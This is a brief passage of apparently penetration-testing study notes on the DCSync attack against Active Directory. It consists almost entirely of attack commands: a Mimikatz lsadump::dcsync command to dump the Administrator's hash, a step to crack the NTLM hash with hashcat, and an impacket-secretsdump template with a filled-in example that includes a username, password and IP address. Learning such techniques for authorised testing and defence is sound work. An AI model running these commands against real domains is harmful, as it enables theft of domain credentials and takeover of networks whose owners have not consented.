6. DCSync Attack



Local DCSync Attack with Mimikatz:

  1. Start Mimikatz.
  2. Perform dump:
lsadump::dcsync /user:corp\Administrator
  1. Crack NTLM with hashcat.

Remote DCSync Attack with Impacket:

  1. Run attack from Kali:
impacket-secretsdump -just-dc-user <targetuser> <domain/user-to-authenticate>:"<password-with-escaped-chars>"@<auth-user-ip>

Example:

impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"BrouhahaTungPerorateBroom2023\!"@192.168.50.72